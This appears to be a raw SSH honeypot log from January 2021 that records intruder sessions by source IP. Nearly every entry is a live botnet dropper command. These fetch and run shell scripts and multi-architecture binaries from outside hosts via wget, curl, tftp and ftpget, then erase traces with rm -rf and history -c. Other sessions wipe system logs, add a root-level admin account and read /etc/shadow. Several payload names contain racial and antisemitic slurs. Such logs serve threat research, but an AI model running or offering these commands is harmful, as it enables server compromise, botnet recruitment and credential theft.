From 109.104.151.10 1-Jan-2021 15:10:58 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://109.104.151.130/setup.sh; curl -O http://109.104.151.130/setup.sh; chmod 777 setup.sh; sh setup.sh; tftp 109.104.151.130 -c get setup.sh; chmod 777 setup.sh; sh setup.sh; tftp -r setup2.sh -g 109.104.151.130; chmod 777 setup2.sh; sh setup2.sh; ftpget -v -u anonymous -p anonymous -P 21 109.104.151.130 setup1.sh setup1.sh; sh setup1.sh; rm -rf setup.sh setup.sh setup2.sh setup1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://109.104.151.130/setup.sh
curl -O http://109.104.151.130/setup.sh
chmod 777 setup.sh
sh setup.sh
tftp 109.104.151.130 -c get setup.sh
chmod 777 setup.sh
sh setup.sh
tftp -r setup2.sh -g 109.104.151.130
chmod 777 setup2.sh
sh setup2.sh
ftpget -v -u anonymous -p anonymous -P 21 109.104.151.130 setup1.sh setup1.sh
sh setup1.sh
rm -rf setup.sh setup.sh setup2.sh setup1.sh
rm -rf *

From 167.99.210.58 1-Jan-2021 15:51:41 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://63.250.56.87/Fourloko.sh; chmod 777 *; sh Fourloko.sh; tftp -g 63.250.56.87 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://63.250.56.87/Fourloko.sh
chmod 777 *
sh Fourloko.sh
tftp -g 63.250.56.87 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 185.117.119.235 2-Jan-2021 08:05:56 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.117.119.71/Optzl/7rtzl.x86_64; curl -O http://185.117.119.71/Optzl/7rtzl.x86_64; chmod +x 7rtzl.x86_64; ./7rtzl.x86_64 Exploit.x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://185.117.119.71/Optzl/7rtzl.x86_64
curl -O http://185.117.119.71/Optzl/7rtzl.x86_64
chmod +x 7rtzl.x86_64
./7rtzl.x86_64 Exploit.x86

From 61.83.181.17 3-Jan-2021 04:27:23 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://209.141.41.96/x86_64; chmod 777 x86_64; ./x86_64
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://209.141.41.96/x86_64
chmod 777 x86_64
./x86_64

From 105.187.233.22 3-Jan-2021 04:57:16 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget https://cdn.discordapp.com/attachments/788792529372839956/790622745460998174/fatnigger.x86; chmod 777 *; ./fatnigger.x86 root
cd /tmp cd /var/run cd /mnt cd /root cd /
wget https://cdn.discordapp.com/attachments/788792529372839956/790622745460998174/fatnigger.x86
chmod 777 *
./fatnigger.x86 root

From 178.62.106.247 3-Jan-2021 09:21:46 ssh2 root
Exec uname -s -v -n -r -m
uname -s -v -n -r -m
Exec uname -s -v -n -r -m
uname -s -v -n -r -m
Exec uname -s -v -n -r -m
uname -s -v -n -r -m
Exec uname -s -v -n -r -m
uname -s -v -n -r -m

From 178.62.106.247 3-Jan-2021 09:30:27 ssh2 root
Exec uname -s -v -n -r -m
uname -s -v -n -r -m
Exec uname -s -v -n -r -m
uname -s -v -n -r -m
Exec uname -s -v -n -r -m
uname -s -v -n -r -m

From 178.62.106.247 3-Jan-2021 09:30:47 ssh2 root
Exec uname -s -v -n -r -m
uname -s -v -n -r -m
Exec uname -s -v -n -r -m
uname -s -v -n -r -m

From 121.140.205.129 3-Jan-2021 19:03:47 ssh2 root
Exec (uname -smr || /bin/uname -smr || /usr/bin/uname -smr)
(uname -smr || /bin/uname -smr || /usr/bin/uname -smr)
Exec ping 8.8.8.8
ping 8.8.8.8

From 51.178.215.251 4-Jan-2021 10:58:56 ssh2 root
Exec wget http://51.178.215.251/we.sh; curl -O http://51.178.215.251/we.sh; chmod 777 we.sh; sh we.sh
wget http://51.178.215.251/we.sh
curl -O http://51.178.215.251/we.sh
chmod 777 we.sh
sh we.sh

From 51.89.107.21 5-Jan-2021 14:28:49 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://130.185.78.144/GhOul.sh; chmod 777 GhOul.sh; sh GhOul.sh; tftp 130.185.78.144 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 130.185.78.144; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 130.185.78.144 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf GhOul.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://130.185.78.144/GhOul.sh
chmod 777 GhOul.sh
sh GhOul.sh
tftp 130.185.78.144 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 130.185.78.144
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 130.185.78.144 ftp1.sh ftp1.sh
sh ftp1.sh
rm -rf GhOul.sh tftp1.sh tftp2.sh ftp1.sh
rm -rf *

From 165.227.133.3 6-Jan-2021 17:37:44 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.14.224.103/fuckjewishpeople.sh; chmod 777 fuckjewishpeople.sh; sh fuckjewishpeople.sh; tftp 45.14.224.103 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.14.224.103; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.14.224.103/fuckjewishpeople.sh
chmod 777 fuckjewishpeople.sh
sh fuckjewishpeople.sh
tftp 45.14.224.103 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 45.14.224.103
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 51.178.218.150 7-Jan-2021 01:19:46 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://51.178.218.149/x-8.6-.GHOUL; chmod +x x-8.6-.GHOUL; ./x-8.6-.GHOUL; rm -rf x-8.6-.GHOUL cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://51.178.218.149/x-3.2-.GHOUL; chmod +x x-3.2-.GHOUL; ./x-3.2-.GHOUL; rm -rf x-3.2-.GHOUL
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://51.178.218.149/x-8.6-.GHOUL
chmod +x x-8.6-.GHOUL
./x-8.6-.GHOUL
rm -rf x-8.6-.GHOUL cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://51.178.218.149/x-3.2-.GHOUL
chmod +x x-3.2-.GHOUL
./x-3.2-.GHOUL
rm -rf x-3.2-.GHOUL

From 193.239.147.226 7-Jan-2021 11:05:44 ssh2 root
Exec cat /etc/issue ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.x86 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.x86 ; chmod 777 downloadthesebinsyoudirtyslut.x86 ; ./downloadthesebinsyoudirtyslut.x86 OPENSSH-2.0 x86 ; wget 193.239.147.226/nigga ; curl -O 193.239.147.226/ ; chmod 777 nigga ; ./nigga OPENSSH-2.0 IoT ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.mips ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.mips ; chmod 777 downloadthesebinsyoudirtyslut.mips ; ./downloadthesebinsyoudirtyslut.mips otherbinexecxdlmfao ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm ; chmod 777 downloadthesebinsyoudirtyslut.arm ; ./downloadthesebinsyoudirtyslut.arm OPENSSH-2.0 IoT ; wget 193.239.147.226/niggadownloadthesebinsyoudirtyslut.arm5 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm5 ; chmod 777 downloadthesebinsyoudirtyslut.arm5 ; ./downloadthesebinsyoudirtyslut.arm5 OPENSSH-2.0 IoT ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm6 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm6 ; chmod 777 downloadthesebinsyoudirtyslut.arm6 ; ./downloadthesebinsyoudirtyslut.arm6 OPENSSH-2.0 IoT ; wget 193.239.147.226/niggadownloadthesebinsyoudirtyslut.arm7 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm7 ; chmod 777 downloadthesebinsyoudirtyslut.arm7 ; ./downloadthesebinsyoudirtyslut.arm7 OPENSSH-2.0 IoT ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.ppc ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.ppc ; chmod 777 downloadthesebinsyoudirtyslut.ppc ; ./downloadthesebinsyoudirtyslut.ppc OPENSSH-2.0 IoT ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.sh4 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.sh4 ; chmod 777 downloadthesebinsyoudirtyslut.sh4 ; ./downloadthesebinsyoudirtyslut.sh4 OPENSSH-2.0 IoT ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.m68k ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.m68k ; chmod 777 downloadthesebinsyoudirtyslut.m68k ; ./downloadthesebinsyoudirtyslut.m68k OPENSSH-2.0 IoT ; rm -rf nigga* ; r9gj 193.239.147.226/bot.pl ; perl bot.pl ; curl -O 193.239.147.226/bot.pl ; perl bot.pl ; rm -rf bot* ; rm -rf bot* ; history -c
cat /etc/issue
wget 193.239.147.226/downloadthesebinsyoudirtyslut.x86
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.x86
chmod 777 downloadthesebinsyoudirtyslut.x86
./downloadthesebinsyoudirtyslut.x86 OPENSSH-2.0 x86
wget 193.239.147.226/nigga
curl -O 193.239.147.226/
chmod 777 nigga
./nigga OPENSSH-2.0 IoT
wget 193.239.147.226/downloadthesebinsyoudirtyslut.mips
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.mips
chmod 777 downloadthesebinsyoudirtyslut.mips
./downloadthesebinsyoudirtyslut.mips otherbinexecxdlmfao
wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm
chmod 777 downloadthesebinsyoudirtyslut.arm
./downloadthesebinsyoudirtyslut.arm OPENSSH-2.0 IoT
wget 193.239.147.226/niggadownloadthesebinsyoudirtyslut.arm5
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm5
chmod 777 downloadthesebinsyoudirtyslut.arm5
./downloadthesebinsyoudirtyslut.arm5 OPENSSH-2.0 IoT
wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm6
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm6
chmod 777 downloadthesebinsyoudirtyslut.arm6
./downloadthesebinsyoudirtyslut.arm6 OPENSSH-2.0 IoT
wget 193.239.147.226/niggadownloadthesebinsyoudirtyslut.arm7
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm7
chmod 777 downloadthesebinsyoudirtyslut.arm7
./downloadthesebinsyoudirtyslut.arm7 OPENSSH-2.0 IoT
wget 193.239.147.226/downloadthesebinsyoudirtyslut.ppc
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.ppc
chmod 777 downloadthesebinsyoudirtyslut.ppc
./downloadthesebinsyoudirtyslut.ppc OPENSSH-2.0 IoT
wget 193.239.147.226/downloadthesebinsyoudirtyslut.sh4
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.sh4
chmod 777 downloadthesebinsyoudirtyslut.sh4
./downloadthesebinsyoudirtyslut.sh4 OPENSSH-2.0 IoT
wget 193.239.147.226/downloadthesebinsyoudirtyslut.m68k
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.m68k
chmod 777 downloadthesebinsyoudirtyslut.m68k
./downloadthesebinsyoudirtyslut.m68k OPENSSH-2.0 IoT
rm -rf nigga*
r9gj 193.239.147.226/bot.pl
perl bot.pl
curl -O 193.239.147.226/bot.pl
perl bot.pl
rm -rf bot*
rm -rf bot*
history -c

From 146.255.75.178 7-Jan-2021 15:49:57 ssh2 root
w
ps x
ls cpu
lscpu

From 146.255.75.178 7-Jan-2021 15:50:44 ssh2 root
ls
cd /home
ls
ls -a
cd .ssh
ls
ls -a
cd .ssh
ls
cd
cd
cd ..
ls
ls -a
cd /etc
ls
cat Mail
ls
clear
ls
exit

From 146.255.75.178 8-Jan-2021 01:14:16 ssh2 root
w
lscpu
w
cat /etc/issue
uname -a
ls
cd /home
ls
cd /etc
ls
ls -a
ls
cd
ls
mkdirr .ssh

From 121.4.66.32 8-Jan-2021 08:40:07 ssh2 root
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime

From 37.46.150.206 8-Jan-2021 14:24:22 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.10.68.211/Fourloko.sh; chmod 777 *; sh Fourloko.sh; tftp -g 185.10.68.211 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://185.10.68.211/Fourloko.sh
chmod 777 *
sh Fourloko.sh
tftp -g 185.10.68.211 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 193.239.147.226 9-Jan-2021 03:30:12 ssh2 root
Exec cat /etc/issue ; wget 193.239.147.226/fbot.x86 ; curl -O 193.239.147.226/fbot.x86 ; chmod 777 fbot.x86 ; ./fbot.x86 OPENSSH-2.0 x86 ; wget 193.239.147.226/niggafbot.x86_64 ; curl -O 193.239.147.226/fbot.x86_64 ; chmod 777 niggafbot.x86_64 ; ./niggafbot.x86_64 OPENSSH-2.0 IoT ; wget 193.239.147.226/fbot.mips ; curl -O 193.239.147.226/fbot.mips ; chmod 777 fbot.mips ; ./fbot.mips otherbinexecxdlmfao ; wget 193.239.147.226/fbot.arm4 ; curl -O 193.239.147.226/fbot.arm4 ; chmod 777 fbot.arm4 ; ./fbot.arm4 OPENSSH-2.0 IoT ; wget 193.239.147.226/niggafbot.arm5 ; curl -O 193.239.147.226/fbot.arm5 ; chmod 777 fbot.arm5 ; ./fbot.arm5 OPENSSH-2.0 IoT ; wget 193.239.147.226/fbot.arm6 ; curl -O 193.239.147.226/fbot.arm6 ; chmod 777 fbot.arm6 ; ./fbot.arm6 OPENSSH-2.0 IoT ; wget 193.239.147.226/niggafbot.arm7 ; curl -O 193.239.147.226/fbot.arm7 ; chmod 777 fbot.arm7 ; ./fbot.arm7 OPENSSH-2.0 IoT ; wget 193.239.147.226/ ; curl -O 193.239.147.226/ ; chmod 777  ; ./ OPENSSH-2.0 IoT ; wget 193.239.147.226/ ; curl -O 193.239.147.226/ ; chmod 777  ; ./ OPENSSH-2.0 IoT ; wget 193.239.147.226/ ; curl -O 193.239.147.226/ ; chmod 777  ; ./ OPENSSH-2.0 IoT ; rm -rf nigga* ; r9gj 193.239.147.226/bot.pl ; perl bot.pl ; curl -O 193.239.147.226/bot.pl ; perl bot.pl ; rm -rf bot* ; rm -rf bot* ; history -c
cat /etc/issue
wget 193.239.147.226/fbot.x86
curl -O 193.239.147.226/fbot.x86
chmod 777 fbot.x86
./fbot.x86 OPENSSH-2.0 x86
wget 193.239.147.226/niggafbot.x86_64
curl -O 193.239.147.226/fbot.x86_64
chmod 777 niggafbot.x86_64
./niggafbot.x86_64 OPENSSH-2.0 IoT
wget 193.239.147.226/fbot.mips
curl -O 193.239.147.226/fbot.mips
chmod 777 fbot.mips
./fbot.mips otherbinexecxdlmfao
wget 193.239.147.226/fbot.arm4
curl -O 193.239.147.226/fbot.arm4
chmod 777 fbot.arm4
./fbot.arm4 OPENSSH-2.0 IoT
wget 193.239.147.226/niggafbot.arm5
curl -O 193.239.147.226/fbot.arm5
chmod 777 fbot.arm5
./fbot.arm5 OPENSSH-2.0 IoT
wget 193.239.147.226/fbot.arm6
curl -O 193.239.147.226/fbot.arm6
chmod 777 fbot.arm6
./fbot.arm6 OPENSSH-2.0 IoT
wget 193.239.147.226/niggafbot.arm7
curl -O 193.239.147.226/fbot.arm7
chmod 777 fbot.arm7
./fbot.arm7 OPENSSH-2.0 IoT
wget 193.239.147.226/
curl -O 193.239.147.226/
chmod 777
./ OPENSSH-2.0 IoT
wget 193.239.147.226/
curl -O 193.239.147.226/
chmod 777
./ OPENSSH-2.0 IoT
wget 193.239.147.226/
curl -O 193.239.147.226/
chmod 777
./ OPENSSH-2.0 IoT
rm -rf nigga*
r9gj 193.239.147.226/bot.pl
perl bot.pl
curl -O 193.239.147.226/bot.pl
perl bot.pl
rm -rf bot*
rm -rf bot*
history -c

From 109.104.151.10 9-Jan-2021 04:14:57 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.117.119.71/0x83911d24Fx.sh; curl -O http://185.117.119.71/0x83911d24Fx.sh; chmod 777 0x83911d24Fx.sh; sh 0x83911d24Fx.sh; tftp 185.117.119.71 -c get 0xt984767.sh; chmod 777 0xft6426467.sh; sh 0xft6426467.sh; tftp -r 0xtf2984767.sh -g 185.117.119.71; chmod 777 0xtf2984767.sh; sh 0xtf2984767.sh; ftpget -v -u anonymous -p anonymous -P 21 185.117.119.71 0xft6426467.sh 0xft6426467.sh; sh 0xft6426467.sh; rm -rf 0xt984767.sh 0xtf2984767.sh 0xft6426467.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://185.117.119.71/0x83911d24Fx.sh
curl -O http://185.117.119.71/0x83911d24Fx.sh
chmod 777 0x83911d24Fx.sh
sh 0x83911d24Fx.sh
tftp 185.117.119.71 -c get 0xt984767.sh
chmod 777 0xft6426467.sh
sh 0xft6426467.sh
tftp -r 0xtf2984767.sh -g 185.117.119.71
chmod 777 0xtf2984767.sh
sh 0xtf2984767.sh
ftpget -v -u anonymous -p anonymous -P 21 185.117.119.71 0xft6426467.sh 0xft6426467.sh
sh 0xft6426467.sh
rm -rf 0xt984767.sh 0xtf2984767.sh 0xft6426467.sh
rm -rf *

From 194.62.6.190 9-Jan-2021 20:23:18 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.33.22/Fourloko.sh; chmod 777 *; sh Fourloko.sh; tftp -g 209.141.33.22 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.33.22/Fourloko.sh
chmod 777 *
sh Fourloko.sh
tftp -g 209.141.33.22 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 146.255.75.178 9-Jan-2021 23:36:39 ssh2 root
w
cd /home
ls
lscpu
cd /tmp
ls
exit

From 146.255.75.178 10-Jan-2021 02:51:32 ssh2 root
w
nproc
lscpu
cd /home
ls
ls -a
ps x
cd /tmp
ls
cd /home
ls
cat mail
jebem ti mater kurac mi popusi poizdrav
exit

From 34.86.59.252 11-Jan-2021 03:39:43 ssh2 root
Exec cat /etc/issue ; wget 119.147.213.57/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 119.147.213.57/bot.pl ; perl bot.pl ; history -c ; rm -rf bot.pl
cat /etc/issue
wget 119.147.213.57/bot.pl
perl bot.pl
rm -rf bot.pl
curl -O 119.147.213.57/bot.pl
perl bot.pl
history -c
rm -rf bot.pl

From 188.166.63.236 11-Jan-2021 17:33:47 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://208.123.209.58/random.sh; curl -O http://208.123.209.58/random.sh; chmod 777 random.sh; sh random.sh; tftp 208.123.209.58 -c get random3.sh; chmod 777 random3.sh; sh random3.sh; tftp -r random2.sh -g 208.123.209.58; chmod 777 random2.sh; sh random2.sh; ftpget -v -u anonymous -p anonymous -P 21 208.123.209.58 random1.sh random1.sh; sh random1.sh; rm -rf random.sh random3.sh random2.sh random1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://208.123.209.58/random.sh
curl -O http://208.123.209.58/random.sh
chmod 777 random.sh
sh random.sh
tftp 208.123.209.58 -c get random3.sh
chmod 777 random3.sh
sh random3.sh
tftp -r random2.sh -g 208.123.209.58
chmod 777 random2.sh
sh random2.sh
ftpget -v -u anonymous -p anonymous -P 21 208.123.209.58 random1.sh random1.sh
sh random1.sh
rm -rf random.sh random3.sh random2.sh random1.sh
rm -rf *

From 195.22.153.177 11-Jan-2021 17:44:14 ssh2 root
Exec nc 1 1; cat /etc/issue
nc 1 1
cat /etc/issue

From 86.120.179.168 11-Jan-2021 17:49:31 ssh2 root
unset
rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
unset HISTFILE
unset HISTSAVE
unset HISTLOG
history -n
unset WATCH
export HISTFILE=/dev/null
export
w
nproc
unset
rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
unset HISTFILE
unset HISTSAVE
unset HISTLOG
history -n
unset WATCH
export HISTFILE=/dev/null
export
ifconfig
cat /etc/passwd
cat /etc/passwd
cd /dev/
ls a
cd shm
ls -a
uname -a
cat /etc/issue
perl

From 86.120.179.168 11-Jan-2021 17:50:57 ssh2 root
yum
apt-get
apt-get intall perl
ps -x

From 86.120.179.168 11-Jan-2021 17:55:29 ssh2 root
w
ps -x
reboot
restart
kill -9 17509
kill -9 17341
ps -x
exit

From 142.93.60.98 12-Jan-2021 04:28:09 ssh2 root
Exec /ip cloud print
/ip cloud print
Exec nproc;uname -a
nproc
uname -a

From 167.99.217.163 12-Jan-2021 12:06:28 ssh2 root
Exec cd /tmp/; wget http://5.253.84.120/bins.sh; chmod 777 bins.sh; sh bins.sh; rm -rf bins.sh; rm -rf *; history -c;

cd /tmp/
wget http://5.253.84.120/bins.sh
chmod 777 bins.sh
sh bins.sh
rm -rf bins.sh
rm -rf *
history -c

From 92.234.53.29 12-Jan-2021 13:43:39 ssh2 root
w
unam e-a
uname -a
/usr/sbin/useradd -o -u 0 admin
adduser admin
cat /etc/shadow
w
uname -a
wget denis.do.am/ah.txt
curl -O denis.do.am/ah.txt
lynx
wget
cat /etc/issue
cat /etc/hosts
uname -a

From 37.46.150.195 12-Jan-2021 20:55:49 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.46.150.225/tekiero.sh; chmod 777 tekiero.sh; sh tekiero.sh; sh /tekiero.sh; bash tekiero.sh; bash /tekiero.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://37.46.150.225/tekiero.sh
chmod 777 tekiero.sh
sh tekiero.sh
sh /tekiero.sh
bash tekiero.sh
bash /tekiero.sh
rm -rf *

From 134.122.15.247 12-Jan-2021 23:46:47 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.46.150.225/fuckjewishpeople.sh; chmod 777 fuckjewishpeople.sh; sh fuckjewishpeople.sh; tftp 37.46.150.225 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 37.46.150.225; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://37.46.150.225/fuckjewishpeople.sh
chmod 777 fuckjewishpeople.sh
sh fuckjewishpeople.sh
tftp 37.46.150.225 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 37.46.150.225
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 104.248.27.245 13-Jan-2021 11:15:19 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.14.224.103/Beastmode.sh; curl -O http://45.14.224.103/Beastmode.sh; chmod 777 Beastmode.sh; sh Beastmode.sh; tftp 45.14.224.103 -c get Beastmode.sh; chmod 777 Beastmode.sh; sh Beastmode.sh; tftp -r Beastmode2.sh -g 45.14.224.103; chmod 777 Beastmode2.sh; sh Beastmode2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.14.224.103 Beastmode1.sh Beastmode1.sh; sh Beastmode1.sh; rm -rf Beastmode.sh Beastmode.sh Beastmode2.sh Beastmode1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.14.224.103/Beastmode.sh
curl -O http://45.14.224.103/Beastmode.sh
chmod 777 Beastmode.sh
sh Beastmode.sh
tftp 45.14.224.103 -c get Beastmode.sh
chmod 777 Beastmode.sh
sh Beastmode.sh
tftp -r Beastmode2.sh -g 45.14.224.103
chmod 777 Beastmode2.sh
sh Beastmode2.sh
ftpget -v -u anonymous -p anonymous -P 21 45.14.224.103 Beastmode1.sh Beastmode1.sh
sh Beastmode1.sh
rm -rf Beastmode.sh Beastmode.sh Beastmode2.sh Beastmode1.sh
rm -rf *

From 35.202.216.172 13-Jan-2021 11:30:47 ssh2 root
Exec uname -a;cat /etc/issue
uname -a
cat /etc/issue

From 37.46.150.206 13-Jan-2021 17:05:47 ssh2 root
Exec hostname -a
hostname -a

From 188.24.3.159 16-Jan-2021 02:16:02 ssh2 root
unset HISTFILE HISTSAVE HISTLOG SCREEN
w
unset HISTFILE HISTSAVE HISTOG SCREEN
w
ls -al
cat .bash_history
wget
cat /etc/issue
cd .ssh
ls -al
exit

From 193.239.147.226 16-Jan-2021 04:35:37 ssh2 root
Exec cat /etc/issue ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.x86 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.x86 ; chmod 777 downloadthesebinsyoudirtyslut.x86 ; ./downloadthesebinsyoudirtyslut.x86 OPENSSH-2.0 x86 ; wget 193.239.147.226/ ; curl -O 193.239.147.226/ ; chmod 777 nigga ; ./ OPENSSH-2.0 IoT ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.mips ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.mips ; chmod 777 downloadthesebinsyoudirtyslut.mips ; ./downloadthesebinsyoudirtyslut.mips otherbinexecxdlmfao ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm4 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm4 ; chmod 777 downloadthesebinsyoudirtyslut.arm4 ; ./downloadthesebinsyoudirtyslut.arm4 OPENSSH-2.0 IoT ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm5 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm5 ; chmod 777 downloadthesebinsyoudirtyslut.arm5 ; ./downloadthesebinsyoudirtyslut.arm5 OPENSSH-2.0 IoT ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm6 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm6 ; chmod 777 downloadthesebinsyoudirtyslut.arm6 ; ./downloadthesebinsyoudirtyslut.arm6 OPENSSH-2.0 IoT ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm7 ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm7 ; chmod 777 downloadthesebinsyoudirtyslut.arm7 ; ./downloadthesebinsyoudirtyslut.arm7 OPENSSH-2.0 IoT ; wget 193.239.147.226/downloadthesebinsyoudirtyslut.ppc ; curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.ppc ; chmod 777 downloadthesebinsyoudirtyslut.ppc ; ./downloadthesebinsyoudirtyslut.ppc OPENSSH-2.0 IoT ; wget 193.239.147.226/ ; curl -O 193.239.147.226/ ; chmod 777  ; ./ OPENSSH-2.0 IoT ; wget 193.239.147.226/ ; curl -O 193.239.147.226/ ; chmod 777  ; ./ OPENSSH-2.0 IoT ; rm -rf nigga* ; r9gj 193.239.147.226/bot.pl ; perl bot.pl ; curl -O 193.239.147.226/bot.pl ; perl bot.pl ; rm -rf bot* ; rm -rf bot* ; history -c
cat /etc/issue
wget 193.239.147.226/downloadthesebinsyoudirtyslut.x86
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.x86
chmod 777 downloadthesebinsyoudirtyslut.x86
./downloadthesebinsyoudirtyslut.x86 OPENSSH-2.0 x86
wget 193.239.147.226/
curl -O 193.239.147.226/
chmod 777 nigga
./ OPENSSH-2.0 IoT
wget 193.239.147.226/downloadthesebinsyoudirtyslut.mips
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.mips
chmod 777 downloadthesebinsyoudirtyslut.mips
./downloadthesebinsyoudirtyslut.mips otherbinexecxdlmfao
wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm4
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm4
chmod 777 downloadthesebinsyoudirtyslut.arm4
./downloadthesebinsyoudirtyslut.arm4 OPENSSH-2.0 IoT
wget 193.239.147.226/downloadthesebinsyoudirtyslut.arm5
curl -O 193.239.147.226/downloadthesebinsyoudirtyslut.arm5
chmod 777 downloadthesebinsyoudirtyslut.arm5
./downloadthesebinsyoudirtyslut.arm5 OPENSSH-2.0 IoT
